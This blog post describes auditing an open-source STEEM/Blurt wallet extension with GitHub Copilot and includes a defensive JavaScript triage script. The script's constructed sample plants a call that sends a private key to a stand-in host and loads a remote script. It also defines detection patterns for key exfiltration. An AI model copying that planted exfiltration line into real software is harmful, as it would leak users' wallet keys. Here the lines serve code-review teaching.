
Auditing blockchain wallet code with Copilot AI


I found that AI can be very useful for auditing code security. For example, I had been using a wallet extension that supports STEEM and Blurt, but it suddenly stopped working. Normally, I clone the source code from GitHub and load the extension locally using the “Load Unpacked Extension” option in Chrome. This method is safer because it avoids the risk of malicious code being introduced during automatic Chrome extension updates — such as secretly uploading users’ private keys.

The reason the extension stopped working this time is that Chrome no longer supports extensions built with Manifest V2. Although there was a short grace period during which V2 extensions could still be manually loaded, that was likely transitional, and support is now completely gone. So I downloaded the source code for the Whault wallet (which supports multiple chains including STEEM and Blurt) from GitHub, opened it in VS Code, and began reviewing the code. I also asked GitHub Copilot to help me check for suspicious logic — particularly any code that might upload private keys to the cloud. Fortunately, nothing suspicious was found, and the code appears to be safe and trustworthy.

Using AI to assist in reviewing the security of extensions or open-source projects is indeed a very practical and effective approach.

Using AI to Audit the Security of Browser Extension Code

In recent years, there have been numerous cases of browser extensions being compromised by malicious code. This is especially concerning in applications involving crypto wallets, where the leakage of a user’s private key could lead to irreversible losses. To mitigate this risk, I’ve always opted to manually review and locally load third-party wallet extensions to ensure the code is trustworthy.

Why the Extension Stopped Working

I had been using a browser wallet extension (Whale Vault) that supports both STEEM and Blurt. To ensure safety, I would clone the source code from GitHub and load the extension locally using Chrome’s “Load Unpacked Extension” feature. This way, I avoid the risk of automatic updates injecting malicious code, such as silently uploading private keys.

However, the extension recently stopped working. Upon investigation, I found that Chrome has officially dropped support for extensions based on Manifest V2. Although it was still possible to load V2 extensions manually for a while, it was clearly just a transition period, and now that option is completely gone.

Auditing Open Source Plugin Code with Copilot

In response, I looked for a new alternative and came across the Whault wallet, which supports multiple chains including STEEM and Blurt. Since it is also open source, I downloaded the code and opened it in VS Code for manual review.

To improve the efficiency of the review, I used GitHub Copilot to assist in the security audit. I focused on checking for:

  • Any logic that sends private keys, seeds or other signing material to a remote server;
  • Loading of remote scripts or other dynamically fetched code;
  • Any form of data collection without user consent.

Fortunately, Copilot didn’t flag any malicious patterns, and I didn’t find anything suspicious in the code either. It appears to be a trustworthy project.
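The three checks above can be turned into a first-pass triage script that runs over the unpacked extension directory before any line-by-line reading or Copilot session starts. The following is an added example, not code from the Whault project or from this post; the manifest and scripts embedded at the bottom are constructed samples, and the list of secret-bearing identifiers is an assumption about how STEEM/Blurt wallets tend to name key material.

```javascript
// Added example: a static triage pass over an unpacked extension's files. Not the
// wallet's code; the manifest and scripts at the bottom are constructed samples.
// It flags network sinks next to key material, remote code loading, and broad permissions.

const NETWORK_SINKS = [
  /\bfetch\s*\(/,
  /\bXMLHttpRequest\b/,
  /\bnavigator\.sendBeacon\s*\(/,
  /\bnew\s+WebSocket\s*\(/,
];
// Identifiers key material tends to carry in STEEM/Blurt-style wallets (assumed list).
const SECRET_TERMS = /\b(privateKey|private_?key|wif|seed|mnemonic|(posting|active|owner|memo)_?key)\b/i;
// Dynamic or remote code: eval/Function, a script.src pointing off-extension, importScripts.
const REMOTE_CODE = /\b(eval|Function)\s*\(|\.src\s*=\s*['"`]https?:|\bimportScripts\s*\(/;

function auditManifest(manifest) {
  const findings = [];
  if (manifest.manifest_version !== 3) {
    findings.push({ kind: 'manifest-version', detail: `manifest_version ${manifest.manifest_version}` });
  }
  const hosts = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  for (const h of hosts) {
    if (h === '<all_urls>' || /^(\*|https?):\/\/\*\//.test(h)) {
      findings.push({ kind: 'broad-host-permission', detail: h });
    }
  }
  // MV2 stored the CSP as a string, MV3 as an object; either way script-src must stay local.
  const csp = typeof manifest.content_security_policy === 'string'
    ? manifest.content_security_policy
    : (manifest.content_security_policy || {}).extension_pages || '';
  if (/script-src[^;]*https?:/.test(csp)) {
    findings.push({ kind: 'remote-script-csp', detail: csp });
  }
  return findings;
}

// A network sink becomes 'key-near-network' when a secret identifier sits within
// `window` lines of it. That is a prompt for manual review, not a verdict: a wallet
// legitimately has the key near the call that posts the *signed* transaction.
function auditSource(path, code, window = 5) {
  const findings = [];
  const lines = code.split('\n');
  lines.forEach((line, i) => {
    if (REMOTE_CODE.test(line)) {
      findings.push({ path, line: i + 1, kind: 'remote-code', text: line.trim() });
    }
    if (NETWORK_SINKS.some((re) => re.test(line))) {
      const ctx = lines.slice(Math.max(0, i - window), i + window + 1).join('\n');
      const kind = SECRET_TERMS.test(ctx) ? 'key-near-network' : 'network';
      findings.push({ path, line: i + 1, kind, text: line.trim() });
    }
  });
  return findings;
}

// files: { relativePath: contents } as read from the unpacked extension directory.
function auditExtension(files) {
  const findings = auditManifest(JSON.parse(files['manifest.json']));
  for (const [path, code] of Object.entries(files)) {
    if (path.endsWith('.js')) findings.push(...auditSource(path, code));
  }
  return findings;
}

// Constructed sample: an MV3 wallet that signs locally and posts the signed
// transaction to a node, plus one planted exfiltration call and one remote script.
const SAMPLE_FILES = {
  'manifest.json': JSON.stringify({
    manifest_version: 3,
    name: 'sample-wallet',
    version: '0.0.1',
    permissions: ['storage'],
    host_permissions: ['https://api.example-node.invalid/*', '<all_urls>'],
    content_security_policy: { extension_pages: "script-src 'self'; object-src 'self'" },
  }),
  'background.js': [
    'async function broadcast(tx, wif) {',
    '  const signed = signTransaction(tx, wif); // key used locally only',
    "  return fetch('https://api.example-node.invalid/', {",
    "    method: 'POST', body: JSON.stringify(signed) });",
    '}',
    '',
    'function telemetry(wif) {',
    "  navigator.sendBeacon('https://collector.invalid/k', wif); // planted exfiltration",
    '}',
  ].join('\n'),
  'ui.js': [
    "const s = document.createElement('script');",
    "s.src = 'https://cdn.invalid/lib.js'; // remote code; MV3 CSP blocks it, still worth flagging",
    'document.head.appendChild(s);',
  ].join('\n'),
};

for (const f of auditExtension(SAMPLE_FILES)) console.log(JSON.stringify(f));
```

On the sample it reports the `<all_urls>` host permission, both network calls in background.js as `key-near-network`, and the remote script in ui.js. The legitimate `broadcast` is flagged alongside the planted `telemetry` on purpose: the script narrows the review to the lines where key material and the network meet, and the reviewer (or Copilot, asked about exactly those lines) decides whether the request body carries a signature or the key itself.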

AI + Security Review Is a Great Combination

This experience has further convinced me of AI's potential in the security domain. For browser extensions and crypto wallets, applications that handle sensitive user data, reviewing code line by line by hand is time-consuming and error-prone. An AI assistant can quickly point at likely risk points (network calls near key material, dynamically loaded code, undeclared data collection) so that human attention goes where it matters, though every finding, and every clean result, still has to be confirmed by reading the code.

Final Thoughts

As the browser extension ecosystem continues to evolve, we can't always rely on official marketplaces to ensure extension security. For extensions that hold sensitive permissions or key material, I recommend that developers and advanced users:

  1. Prefer open-source extensions and fetch the code from the project's official repository, at a tagged release or a commit you have actually reviewed;
  2. Load the reviewed code unpacked instead of installing from the extension store, and re-review before pulling in updates, since an unpacked extension does not update on its own;
  3. Pair an AI assistant such as GitHub Copilot with a static analysis engine such as CodeQL; Copilot is a prompt-driven helper and CodeQL a query-based scanner, and neither replaces reading the key-handling and network paths yourself;
  4. Verify runtime behavior where needed with the browser's DevTools network panel or a local intercepting proxy, watching which hosts the extension contacts and what it sends.

Using AI to audit code is not just an efficiency boost — it’s also a reflection of strong security awareness.


–EOF (The Ultimate Computing & Technology Blog) —
